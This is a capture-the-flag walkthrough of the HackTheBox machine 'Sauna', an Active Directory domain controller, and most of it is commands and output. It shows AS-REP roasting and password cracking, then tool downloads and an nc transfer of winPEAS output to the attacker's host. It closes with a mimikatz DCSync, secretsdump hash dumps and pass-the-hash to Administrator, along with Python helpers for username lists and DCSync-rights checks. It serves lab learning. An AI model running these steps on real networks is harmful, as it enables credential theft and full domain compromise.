Disclaimer

The host tested in this article was accessed with legitimate authorization. The tools and methods used here are for learning and exchange only. Do not use the tools or the penetration approach described in this article for any illegal purpose; the author accepts no responsibility for any consequences of doing so, nor for any misuse or damage caused.

Service enumeration

Port discovery

┌──(rootkali)-[~/htb/Sauna]
└─# nmap -p- -Pn 10.10.10.175 --open
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-03 09:23 EST
Nmap scan report for 10.10.10.175
Host is up (0.26s latency).
Not shown: 65515 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49677/tcp open  unknown
49689/tcp open  unknown
49697/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 1192.54 seconds

Detailed port information

┌──(rootkali)-[~/htb/Sauna]
└─# nmap -Pn -sV -A -O 10.10.10.175 -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49673,49674,49677,49686,49697
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-03 09:45 EST
Nmap scan report for 10.10.10.175
Host is up (0.26s latency).

PORT      STATE    SERVICE       VERSION
53/tcp    open     domain        Simple DNS Plus
80/tcp    open     http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2022-01-03 22:45:17Z)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open     microsoft-ds?
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open     tcpwrapped
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open     tcpwrapped
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open     adws?
| fingerprint-strings: 
|   DNSStatusRequestTCP, Kerberos, SMBProgNeg, afp, oracle-tns: 
|_    Ihttp://schemas.microsoft.com/ws/2006/05/framing/faults/UnsupportedVersion
49667/tcp open     msrpc         Microsoft Windows RPC
49673/tcp open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open     msrpc         Microsoft Windows RPC
49677/tcp open     msrpc         Microsoft Windows RPC
49686/tcp filtered unknown
49697/tcp open     msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9389-TCP:V=7.91%I=7%D=1/3%Time=61D30C0C%P=x86_64-pc-linux-gnu%r(DNS
SF:StatusRequestTCP,4B,"\x08Ihttp://schemas\.microsoft\.com/ws/2006/05/fra
SF:ming/faults/UnsupportedVersion")%r(Kerberos,4B,"\x08Ihttp://schemas\.mi
SF:crosoft\.com/ws/2006/05/framing/faults/UnsupportedVersion")%r(SMBProgNe
SF:g,4B,"\x08Ihttp://schemas\.microsoft\.com/ws/2006/05/framing/faults/Uns
SF:upportedVersion")%r(oracle-tns,4B,"\x08Ihttp://schemas\.microsoft\.com/
SF:ws/2006/05/framing/faults/UnsupportedVersion")%r(afp,4B,"\x08Ihttp://sc
SF:hemas\.microsoft\.com/ws/2006/05/framing/faults/UnsupportedVersion");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8h00m00s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-01-03T22:46:21
|_  start_date: N/A

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   253.57 ms 10.10.14.1
2   254.12 ms 10.10.10.175

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 121.12 seconds

DNS, Kerberos and LDAP (plus the global catalog on 3268/3269, kpasswd on 464 and ADWS on 9389) make it clear this is a Domain Controller. Two details from the host scripts matter later: the clock skew is 8 hours, so any tool that authenticates with Kerberos from Kali will need the local clock brought within the KDC's 5-minute tolerance first, and SMB signing is required, so relaying NTLM to this host is not an option.

Enumerating the domain name

┌──(rootkali)-[~/htb/Sauna]
└─# crackmapexec smb 10.10.10.175 -u 'anonymous' -p '' --shares
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.175    445    SAUNA            [-] EGOTISTICAL-BANK.LOCAL\anonymous: STATUS_LOGON_FAILURE 

This gives us the domain name: EGOTISTICAL-BANK.LOCAL

After a lot of further enumeration nothing useful came out of it: the SMB shares cannot be listed without credentials, and no valid usernames are known yet.

Kerberos

Use nmap's krb5-enum-users script to enumerate Kerberos usernames (it sends an AS-REQ per name; the KDC answers differently for principals that exist, without needing credentials)

┌──(rootkali)-[~/htb/Sauna]
└─# nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="EGOTISTICAL-BANK.LOCAL",userdb=/usr/share/wordlists/SecLists/Usernames/cirt-default-usernames.txt 10.10.10.175
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-03 07:03 EST
Nmap scan report for 10.10.10.175
Host is up (0.30s latency).

PORT   STATE SERVICE
88/tcp open  kerberos-sec
| krb5-enum-users: 
| Discovered Kerberos principals
|     ADMINISTRATOR@EGOTISTICAL-BANK.LOCAL
|     Administrator@EGOTISTICAL-BANK.LOCAL
|_    administrator@EGOTISTICAL-BANK.LOCAL

Nmap done: 1 IP address (1 host up) scanned in 41.32 seconds

Only the administrator account turns up (the three spellings are one principal, since the KDC matches names case-insensitively), and we obviously have no access to it yet.

The HTTP service on port 80 looks like a corporate brochure site; try to build a user list from it

cewl -d 1 -m 3 -w user.txt 10.10.10.175

Then enumerate Kerberos usernames again with the generated list

┌──(rootkali)-[~/htb/Sauna]
└─# nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="EGOTISTICAL-BANK.LOCAL",userdb=/root/htb/Sauna/user.txt 10.10.10.175
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-03 08:00 EST
Nmap scan report for 10.10.10.175
Host is up (0.30s latency).

PORT   STATE SERVICE
88/tcp open  kerberos-sec
| krb5-enum-users: 
| Discovered Kerberos principals
|_    sauna@EGOTISTICAL-BANK.LOCAL

Nmap done: 1 IP address (1 host up) scanned in 16.22 seconds

This yields a new principal, sauna. It matches the host name SAUNA from the nmap output, so it is most likely the computer account (SAUNA$ shows up in the later hash dump) rather than a person.

Web

The About Us page exposes the names of the team members, so we build a username dictionary by hand using the common corporate patterns (First Last, FirstLast, First.Last, First.L, flast),
and add the two Kerberos principals found above to it

┌──(rootkali)-[~/htb/Sauna]
└─# cat user
Fergus Smith
FergusSmith
Fergus.Smith
FergusSmith
Fergus.S
fsmith
Shaun Coins
ShaunCoins
Shaun.Coins
ShaunCoins
Shaun.C
scoins
Hugo Bear
HugoBear
Hugo.Bear
HugoBear
Hugo.B
hbear
Bowie Taylor
BowieTaylor
Bowie.Taylor
BowieTaylor
Bowie.T
btaylor
Sophie Driver
SophieDriver
Sophie.Driver
SophieDriver
Sophie.D
sdriver
Steven Kerb
StevenKerb
Steven.Kerb
StevenKerb
Steven.K
skerb
sauna
administrator
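The list above was typed by hand. As an added example (my script, not the author's), here is the same idea automated in Python: it takes the team names from the About Us page and emits the usual corporate username patterns. It goes a little beyond the page's list by also trying F.Last, LastF, Last.First, First_Last and the bare first/last names, and it emits a lower-case twin of every pattern, because a pattern that misses costs nothing while the one that hits (here FSmith) is the whole game.

```python
"""Generate candidate usernames from full names for Kerberos user enumeration.

Added example, not the author's script. TEAM holds the names the page took
from the About Us page; every pattern beyond the page's own six is my
addition, chosen because it is a common AD naming convention.
"""

# Names taken from the page's About Us enumeration.
TEAM = ["Fergus Smith", "Shaun Coins", "Hugo Bear",
        "Bowie Taylor", "Sophie Driver", "Steven Kerb"]


def candidates(full_name):
    """Return username candidates for one 'First Last' name, in a stable order."""
    parts = full_name.split()
    if len(parts) < 2:
        return [full_name]
    first, last = parts[0], parts[-1]
    f, l = first[0], last[0]
    patterns = [
        f"{first} {last}",   # as written on the web page
        f"{first}{last}",    # FergusSmith
        f"{first}.{last}",   # Fergus.Smith
        f"{first}{l}",       # FergusS
        f"{first}.{l}",      # Fergus.S
        f"{f}{last}",        # FSmith  (the pattern that exists on Sauna)
        f"{f}.{last}",       # F.Smith
        f"{last}{f}",        # SmithF
        f"{last}.{first}",   # Smith.Fergus
        f"{first}_{last}",   # Fergus_Smith
        first,               # Fergus
        last,                # Smith
    ]
    out = []
    for p in patterns:
        for variant in (p, p.lower()):   # case matters to the wordlist, not the KDC
            if variant not in out:
                out.append(variant)
    return out


def build_wordlist(names, extra=()):
    """Candidates for every name plus already-known principals, deduplicated."""
    words = []
    for name in names:
        for c in candidates(name):
            if c not in words:
                words.append(c)
    for e in extra:
        if e not in words:
            words.append(e)
    return words


if __name__ == "__main__":
    wordlist = build_wordlist(TEAM, extra=["sauna", "administrator"])
    with open("user", "w") as fh:           # feed this to krb5-enum-users / GetNPUsers.py
        fh.write("\n".join(wordlist) + "\n")
    print(f"{len(wordlist)} candidates written to ./user")
```

The output file drops straight into the `userdb=` argument of krb5-enum-users or `-usersfile` of GetNPUsers.py.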

Use GetNPUsers.py to request an AS-REP for every candidate; for accounts that do not require Kerberos pre-authentication the KDC hands one back without a password (AS-REP roasting)

HackTricks explains it like this:

That means that anyone can send an AS_REQ request to the DC on behalf of any of those users, and receive an AS_REP message. This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline.

┌──(rootkali)-[~/htb/Sauna]
└─# python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile /root/htb/Sauna/user -outputfile hashes.asreproast -dc-ip 10.10.10.175

One account, fsmith, returns a roastable AS-REP (names that do not exist, or that do require pre-authentication, just produce error lines). The saved hash has the form $krb5asrep$23$user@REALM:checksum$ciphertext: 23 is the encryption type (RC4-HMAC, whose key is simply the account's NT hash), the 32 hex digits after the colon are the HMAC-MD5 checksum and the remainder (elided below) is the encrypted enc-part. Because the key derivation is one MD4, this cracks at millions of candidates per second.

┌──(rootkali)-[~/htb/Sauna]
└─# cat hashes.asreproast 
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:85853ae8057c9c84f1ae5e3860cfcf35$[...]

Crack it with john

┌──(rootkali)-[~/htb/Sauna]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hashes.asreproast 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23     ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL)
1g 0:00:00:10 DONE (2022-01-03 10:33) 0.09775g/s 1030Kp/s 1030Kc/s 1030KC/s Thing..Thehunter22
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Foothold

That gives us a valid credential: fsmith:Thestrokes23

Log in with evil-winrm (5985/tcp, WinRM, was open) to get a foothold and user.txt

┌──(rootkali)-[~/htb/Sauna]
└─# evil-winrm -i 10.10.10.175 -u 'fsmith' -p 'Thestrokes23'

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami
egotisticalbank\fsmith

Privilege escalation

Transfer winPEAS and nc to the target (served from Kali on port 8000, for example with python3 -m http.server 8000):

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.16.3:8000/winPEASx64.exe','C:\Users\FSmith\Desktop\winPEASx64.exe')"

Run winPEAS and redirect its output to o.txt:

&{C:\Users\FSmith\Desktop\winPEASx64.exe} > o.txt

Send the file back with nc.exe from PowerShell

Receiver (Kali):
nc -nlvp 4444 > o.txt

Sender (target):
Get-Content o.txt | .\nc.exe -w 3 10.10.16.3 4444 | tee test.log

In the output winPEAS finds a password in the AutoLogon values of the Winlogon registry key

Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!

Check the users on the target

*Evil-WinRM* PS C:\> net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator            FSmith                   Guest
HSmith                   krbtgt                   svc_loanmgr
The command completed with one or more errors.

The AutoLogon entry names svc_loanmanager, which does not exist as written; the closest real account is svc_loanmgr, and the recovered password works for it. Log in as svc_loanmgr with evil-winrm and look at the account's details

*Evil-WinRM* PS C:\> net users svc_loanmgr
User name                    svc_loanmgr
Full Name                    L Manager
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/24/2020 3:48:31 PM
Password expires             Never
Password changeable          1/25/2020 3:48:31 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

svc_loanmgr is a member of Remote Management Users (net user truncates the group name in its column)

Look at the group's description

*Evil-WinRM* PS C:\Users\FSmith\Desktop> net localgroup "Remote Management Users"
Alias name     Remote Management Users
Comment        Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.

Members

-------------------------------------------------------------------------------
FSmith
svc_loanmgr
The command completed successfully.

So it is just the group that permits WinRM logons, nothing more privileged; the account's group memberships explain how we got a shell, not how to escalate.

We therefore try a DCSync attack to extract the domain's account hashes

HackTricks describes DCSync like this:

  1. The DCSync attack simulates the behavior of a Domain Controller and asks other Domain Controllers to replicate information using the Directory Replication Service Remote Protocol (MS-DRSR). Because MS-DRSR is a valid and necessary function of Active Directory, it cannot be turned off or disabled.
  2. By default only Domain Admins, Enterprise Admins, Administrators, and Domain Controllers groups have the required privileges.
  3. If any account passwords are stored with reversible encryption, an option is available in Mimikatz to return the password in clear text

So by default only Domain Admins, Enterprise Admins, Administrators and Domain Controllers can do this; any other principal that can DCSync must have been granted the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights on the domain object explicitly (which is exactly what the addendum finds for svc_loanmgr).

Transfer mimikatz.exe from Kali to the target:

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.16.3:8000/mimikatz.exe','C:\Users\svc_loanmgr\Documents\mimikatz.exe')"

Run the following to request replication from the DC (a "DC sync"):

mimikatz.exe privilege::debug "lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /all /csv" exit

The account hashes are exported. privilege::debug fails with c0000061 (STATUS_PRIVILEGE_NOT_HELD) because svc_loanmgr has no SeDebugPrivilege, but that does not matter here: DCSync talks to the DC over DRSUAPI with the caller's own token and never touches LSASS, so the lsadump::dcsync step succeeds anyway. The /csv columns are RID, account name, NT hash and userAccountControl.

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> ./mimikatz.exe privilege::debug "lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /all /csv" exit

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 18 2020 19:18:29
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

mimikatz(commandline) # lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /all /csv
[DC] 'EGOTISTICAL-BANK.LOCAL' will be the domain
[DC] 'SAUNA.EGOTISTICAL-BANK.LOCAL' will be the DC server
[DC] Exporting domain 'EGOTISTICAL-BANK.LOCAL'
502     krbtgt  4a8899428cad97676ff802229e466e2c        514
1103    HSmith  58a52d36c84fb7f5f1beab9a201db1dd        66048
1000    SAUNA$  230699e71e07d687981fc0685082b5cc        532480
500     Administrator   823452073d75b9d1cf70ebdf86c7f98e        66048
1105    FSmith  58a52d36c84fb7f5f1beab9a201db1dd        4260352
1108    svc_loanmgr     9cb31797c39a9b170b04058ba2bba48c        66048

mimikatz(commandline) # exit
Bye!

Use the Administrator NT hash directly with evil-winrm (pass-the-hash: WinRM accepts NTLM authentication, and NTLM only needs the hash, not the password)

┌──(rootkali)-[~/htb/Sauna]
└─# evil-winrm -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e -i 10.10.10.175

Evil-WinRM shell v3.2

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
egotisticalbank\administrator

Summary

From the names shown on the web page we guessed a valid username.
Using GetNPUsers.py to request tickets for accounts that do not require Kerberos pre-authentication, we got a foothold.
Using winPEAS we found another user's clear-text credentials and moved to svc_loanmgr.
Using DCSync we obtained the administrator's hash and escalated to Administrator.

Addendum

secretsdump.py

Once we have svc_loanmgr's credentials, secretsdump.py can dump the other accounts' hashes as well; under the hood it is the same DCSync. The initial "RemoteOperations failed ... rpc_s_access_denied" line is expected: secretsdump first tries the remote-registry route (SAM and LSA secrets), which needs local admin, and then falls back to the DRSUAPI replication method, which only needs the replication rights:

┌──(rootkali)-[~/htb/Sauna]
└─# python3 /usr/share/doc/python3-impacket/examples/secretsdump.py EGOTISTICALBANK/svc_loanmgr:Moneymakestheworldgoround\\!@10.10.10.175
Impacket v0.9.24.dev1+20210906.175840.50c76958 - Copyright 2021 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:230699e71e07d687981fc0685082b5cc:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:8dccc32df17c3189f01f7702e6198f9a01199229d04420d830bca8dc8a1b483e
SAUNA$:aes128-cts-hmac-sha1-96:a2927c8ea3e312d65894d9b1e508931f
SAUNA$:des-cbc-md5:7c2c156d022c0131
[*] Cleaning up... 

How do we know whether the current account has DCSync rights?

Download PowerView.ps1 to Kali

Log in to the target, pointing evil-winrm's -s at the directory holding the script

┌──(rootkali)-[~/htb/Sauna]
└─# evil-winrm -i 10.10.10.175 -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!' -s '/root/PowerSploit/Recon'

Load PowerView.ps1 (with -s set, typing the script name loads it into the session)

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> PowerView.ps1

Check the rights svc_loanmgr and FSmith hold on the domain object

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> Get-ObjectAcl -DistinguishedName "dc=EGOTISTICAL-BANK,dc=LOCAL" -ResolveGUIDs | ? {$_.IdentityReference -match "svc_loanmgr|Fsmith"}

InheritedObjectType   : All
ObjectDN              : DC=EGOTISTICAL-BANK,DC=LOCAL
ObjectType            : All
IdentityReference     : EGOTISTICALBANK\FSmith
IsInherited           : False
ActiveDirectoryRights : ReadProperty, GenericExecute
PropagationFlags      : None
ObjectFlags           : None
InheritanceFlags      : None
InheritanceType       : None
AccessControlType     : Allow
ObjectSID             : S-1-5-21-2966785786-3096785034-1186376766
/usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:39: warning: constant OpenSSL::Cipher::Cipher is deprecated
/usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:128: warning: constant OpenSSL::Cipher::Cipher is deprecated
/usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:138: warning: constant OpenSSL::Cipher::Cipher is deprecated

InheritedObjectType   : All
ObjectDN              : DC=EGOTISTICAL-BANK,DC=LOCAL
ObjectType            : All
IdentityReference     : EGOTISTICALBANK\svc_loanmgr
IsInherited           : False
ActiveDirectoryRights : ReadProperty, GenericExecute
PropagationFlags      : None
ObjectFlags           : None
InheritanceFlags      : None
InheritanceType       : None
AccessControlType     : Allow
ObjectSID             : S-1-5-21-2966785786-3096785034-1186376766

InheritedObjectType   : All
ObjectDN              : DC=EGOTISTICAL-BANK,DC=LOCAL
ObjectType            : DS-Replication-Get-Changes
IdentityReference     : EGOTISTICALBANK\svc_loanmgr
IsInherited           : False
ActiveDirectoryRights : ExtendedRight
PropagationFlags      : None
ObjectFlags           : ObjectAceTypePresent
InheritanceFlags      : None
InheritanceType       : None
AccessControlType     : Allow
ObjectSID             : S-1-5-21-2966785786-3096785034-1186376766

InheritedObjectType   : All
ObjectDN              : DC=EGOTISTICAL-BANK,DC=LOCAL
ObjectType            : DS-Replication-Get-Changes-All
IdentityReference     : EGOTISTICALBANK\svc_loanmgr
IsInherited           : False
ActiveDirectoryRights : ExtendedRight
PropagationFlags      : None
ObjectFlags           : ObjectAceTypePresent
InheritanceFlags      : None
InheritanceType       : None
AccessControlType     : Allow
ObjectSID             : S-1-5-21-2966785786-3096785034-1186376766

Note the ObjectType column: svc_loanmgr holds the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights on the domain object, while FSmith only has ReadProperty and GenericExecute.
Holding both replication rights is exactly what DCSync requires, so svc_loanmgr can perform it; see this article
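The same check can be done offline, without loading PowerView on the target. As an added example (my code, not the author's or PowerView's), the script below takes the domain object's security descriptor as an SDDL string, which the AD PowerShell module exports with (Get-Acl "AD:\DC=EGOTISTICAL-BANK,DC=LOCAL").Sddl, and lists the SIDs that hold both replication rights. It matches the extended-right ACEs by their well-known GUIDs (1131f6aa-... for Get-Changes, 1131f6ad-... for Get-Changes-All) and also treats GenericAll, or an unscoped control-access grant, as sufficient. The SAMPLE_SDDL is constructed for illustration: the domain SID and the RIDs 1103 (HSmith), 1105 (FSmith) and 1108 (svc_loanmgr) are the ones the page dumped, and it gives HSmith only one of the two rights to show that half is not enough. Deny ACEs and group membership are deliberately not evaluated, so group SIDs have to be resolved separately.

```python
"""Find which principals hold DCSync rights in a domain-head ACL given as SDDL.

Added example, not part of the original post. The SAMPLE_SDDL is constructed;
the domain SID and RIDs 1103/1105/1108 are the ones from the page's dump.
"""
import re

# Control-access right GUIDs for directory replication (MS-ADTS).
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DCSYNC_RIGHTS = {"Get-Changes", "Get-Changes-All"}

# Access-mask bits used when the SDDL rights field is written as hex.
ADS_RIGHT_GENERIC_ALL = 0x10000000
ADS_RIGHT_DS_CONTROL_ACCESS = 0x00000100

DOMAIN_SID = "S-1-5-21-2966785786-3096785034-1186376766"
KNOWN_SIDS = {  # resolution table built from the RIDs the page dumped
    f"{DOMAIN_SID}-1103": "EGOTISTICALBANK\\HSmith",
    f"{DOMAIN_SID}-1105": "EGOTISTICALBANK\\FSmith",
    f"{DOMAIN_SID}-1108": "EGOTISTICALBANK\\svc_loanmgr",
    "SY": "NT AUTHORITY\\SYSTEM",
}

# Constructed sample: FSmith can only read, svc_loanmgr has both replication
# rights (the Sauna situation), HSmith has just one of them, SYSTEM has GA.
SAMPLE_SDDL = (
    "O:DAG:DAD:AI"
    f"(A;;RPLCLORC;;;{DOMAIN_SID}-1105)"
    f"(OA;;CR;{DS_REPLICATION_GET_CHANGES};;{DOMAIN_SID}-1108)"
    f"(OA;;CR;{DS_REPLICATION_GET_CHANGES_ALL};;{DOMAIN_SID}-1108)"
    f"(OA;;CR;{DS_REPLICATION_GET_CHANGES};;{DOMAIN_SID}-1103)"
    "(A;;GA;;;SY)"
)


def parse_aces(sddl):
    """Return the DACL ACEs of an SDDL string as dicts (a SACL, if present, is ignored)."""
    m = re.search(r"D:(.*?)(?:S:|$)", sddl)
    if not m:
        return []
    aces = []
    for body in re.findall(r"\(([^)]*)\)", m.group(1)):
        f = body.split(";")
        if len(f) < 6:
            continue
        aces.append({"type": f[0], "flags": f[1], "rights": f[2],
                     "object": f[3].lower(), "inherit_object": f[4].lower(),
                     "sid": f[5]})
    return aces


def rights_tokens(rights):
    """Expand the rights field into two-letter tokens; hex masks are mapped too."""
    if rights.lower().startswith("0x"):
        mask = int(rights, 16)
        toks = set()
        if mask & ADS_RIGHT_GENERIC_ALL:
            toks.add("GA")
        if mask & ADS_RIGHT_DS_CONTROL_ACCESS:
            toks.add("CR")
        return toks
    return {rights[i:i + 2] for i in range(0, len(rights), 2)}


def dcsync_principals(sddl, resolve=lambda sid: sid):
    """Map principal -> sorted replication rights, only for those holding both.

    GenericAll, or a control-access ACE with no object GUID (which covers
    every extended right), implies both. Deny ACEs are skipped and group
    membership is not expanded."""
    held = {}
    for ace in parse_aces(sddl):
        if ace["type"] not in ("A", "OA"):
            continue
        toks = rights_tokens(ace["rights"])
        got = held.setdefault(ace["sid"], set())
        if "GA" in toks or ("CR" in toks and ace["object"] == ""):
            got |= DCSYNC_RIGHTS
        elif "CR" in toks and ace["object"] == DS_REPLICATION_GET_CHANGES:
            got.add("Get-Changes")
        elif "CR" in toks and ace["object"] == DS_REPLICATION_GET_CHANGES_ALL:
            got.add("Get-Changes-All")
    return {resolve(sid): sorted(r) for sid, r in held.items() if DCSYNC_RIGHTS <= r}


if __name__ == "__main__":
    found = dcsync_principals(SAMPLE_SDDL, lambda s: KNOWN_SIDS.get(s, s))
    for who, rights in found.items():
        print(f"{who}: {', '.join(rights)}")
```

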